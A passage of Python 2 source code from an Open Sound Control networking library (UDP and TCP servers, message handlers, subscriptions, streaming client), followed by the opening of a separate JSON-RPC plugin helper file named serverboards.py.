return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0, **kwds):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass, **kwds)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError, e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print "SERVER: New client connection."
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print "SERVER: Client connection handled."
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error, e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print "SERVER: Entered server loop"
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print "OSC stream server: Spurious message received."
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error, e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print "SERVER: Connection has been reset by peer."
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return None
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return None
else:
raise e
if not tmp or len(tmp) == 0:
print "CLIENT: Socket has been closed."
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print "CLIENT: Entered receiving thread."
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print "CLIENT: Receiving thread terminated."
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return False
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
serverboards.py
|
import json
import os
import sys
import select
import time
import io
import threading
import sh as real_sh
from contextlib import contextmanager
plugin_id = os.environ.get("PLUGIN_ID")
# May be overwritten by user program to fore all error to log
stderr = sys.stderr
def ellipsis_str(str, maxs=50):
if len(str) < maxs:
return str
else:
firsth = int(maxs * 3 / 4)
lasth = maxs - firsth
return "%s...%s" % (str[:firsth], str[-lasth:])
class RPC:
"""
Manages all the RPC status and calls.
"""
def __init__(self, stdin, stdout):
"""
Initilize the JSON-RPC communication object
This class allows to register methods, event handlers, timers and file
descriptor handlers to ease the communication using JSON-RPC.
# Parameters
param | type | description
-------|----------|------------
stdin | file | Which input file to use to read JSON-RPC calls.
stdout | file | File to write JSON-RPC calls. The remote endpoint.
"""
self.__rpc_registry = {}
# ensure input is utf8,
# https://stackoverflow.com/questions/16549332/python-3-how-to-specify-stdin-encoding
self.__stdin = None
self.stdout = stdout
self.__loop_status = 'OUT' # IN | OUT | EXIT
self.__requestq = [] # requests that are pending to do
self.__replyq = {} # replies got out of order: id to msg
self.__send_id = 1 # current id to send
self.__manual_replies = set() # this has been replied with `reply`
self.__fdevents = {}
# timer_id -> (next_stop, id, seconds, continuation)
self.__timers = {}
self.__timer_id = 1
self.__subscriptions = {}
self.__subscriptions_ids = {}
self.__subscription_id = 1
self.__pending_events_queue = []
# This is the last id received from the other side
self.__last_rpc_id = 0
# id to callback when receiving asynchornous responses
self.__async_cb = {}
self.__debug = False
# functions to be called ASAP at the main loops
self.__call_soon = []
# Async events, managed at the __event_signal_r/w fds
# If a 4 byte int is written to event_signal_w, that event is
# trigered to be returned by loop_until(event=id)
self.__event_id = 1
self.__event_results = {}
self.__events = {}
r, w = os.pipe()
r, w = os.fdopen(r, "rb"), os.fdopen(w, "wb")
self.__event_signal_r = r
self.__event_signal_w = w
